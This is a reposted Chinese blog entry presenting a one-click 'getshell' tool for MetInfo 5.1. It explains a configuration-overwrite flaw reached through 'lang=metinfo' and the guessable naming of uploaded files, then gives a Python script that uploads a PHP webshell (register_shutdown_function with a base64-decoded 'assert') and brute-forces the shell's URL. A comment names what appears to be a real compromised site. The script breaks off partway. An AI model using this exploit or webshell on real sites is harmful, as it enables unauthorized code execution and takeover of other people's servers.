码迷,mamicode.com
首页 > 系统相关 > 详细

MetInfo 5.1 自动化getshell工具

时间:2016-12-30 19:19:16      阅读:786      评论:0      收藏:0      [点我收藏+]

标签:extra   write   http   title   back   function   man   val   imp   



title: MetInfo V5.1 GetShell一键化工具
date: 2016-06-08 22:40:32
categories: Hacker
tags:
 - Hacker
 - Tools
---
----------
# 漏洞解析:
----------
**config/config.inc.php**
```php
$langoks = $db->get_one("SELECT * FROM $met_lang WHERE lang=‘$lang‘");

if(!$langoks)die(No data in the database,please reinstall.);

if(!$langoks[useok]&&!$metinfoadminok)okinfo(../404.html);

if(count($met_langok)==1)$lang=$met_index_type;

$query = "SELECT * FROM $met_config WHERE lang=‘$lang‘ or lang=‘metinfo‘";//看这里

$result = $db->query($query);

while($list_config= $db->fetch_array($result)){

    if($metinfoadminok)$list_config[value]=str_replace(", ", str_replace("", ',$list_config[value]));

    $settings_arr[]=$list_config;

    if($list_config[columnid]){

        $settings[$list_config[name]._.$list_config[columnid]]=$list_config[value];

    }else{

        $settings[$list_config[name]]=$list_config[value];

    }

}

@extract($settings);
```
----------
<!--more-->
访问

http:///localhost/metinfo5.1/index.php?lang=metinfo

`SELECT * FROM met_config WHERE lang=metinfo or lang=metinfo`

----------
## 文件命名方式:
----------
**/feedback/uploadfile_save.php**
```php
srand((double)microtime() * 1000000);

$rnd = rand(100, 999);

$name = date(U) + $rnd;

$name = $name.".".$ext;

```
**文件保存在/upload/file/目录**

命名方式就是时间戳去掉后三位,紧接着一个三位数的随机数

可爆破:

如

http://127.0.0.1/upload/file/1465394396.php

----------

# 一键化利用工具:

----------

**本程序基于python编写**

```python
#!/usr/bin/env python
#-*- coding: utf-8 -*-

import requests
import Queue
import threading
import time
import sys


headers = {User-Agent:Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.10 Safari/537.36}

urls = Queue.Queue()
#http://hb.jhxjd.com/upload/file/1441445378.php

def bp(urls,time_out):
    while not urls.empty():
        base_url = urls.get()
        response = None

        try:
            time.sleep(int(time_out))#延时设置
            response = requests.get(base_url,headers=headers)
            if response.status_code == 404:
                print Not Fount----%s  % base_url
        except:
            continue
        finally:
            if response:
                with open(url.txt,a+) as f:
                    f.write(%s?e=YXNzZXJ0 %base_url)

def main(target_url,thread_num,time_out):

    #取出当前时间戳并删除后四位
    now = str(int(time.time()))[:-4]

    #将所有的待爆破地址遍历并加入队列
    for i in range(0,10):
        for j in range(100,1000):
            num_str = ‘‘.join((str(i),str(j)))
            url = ‘‘.join((%s/upload/file/%s % (target_url,now),num_str,.php))
            urls.put(url)

    #上传文件
    with open(xiaoma.php,w+) as fi:
        fi.write("<?php $e = $_REQUEST[‘e‘];register_shutdown_function(base64_decode($e), $_REQUEST[‘Akkuman‘]);?>")
    data = {
            fd_para[1][para]:filea,
            fd_para[1][type]:5
            }
    files = {filea: open("xiaoma.php", rb)}
    upload_url = %s/feedback/uploadfile_save.php?met_file_format=pphphp&met_file_maxsize=9999&lang=metinfo % target_url
    res = requests.post(upload_url,data = data,files=files)
    #等待两秒  文件上传
    time.sleep(2)

     ---转载

hacktech.cn|53xiaoshuo.com

MetInfo 5.1 自动化getshell工具

标签:extra   write   http   title   back   function   man   val   imp   

原文地址:http://www.cnblogs.com/zgyc/p/6237753.html

(0)
(0)
   
举报
评论 一句话评论(0
登录后才能评论!
© 2014 mamicode.com 版权所有  联系我们:gaon5@hotmail.com
迷上了代码!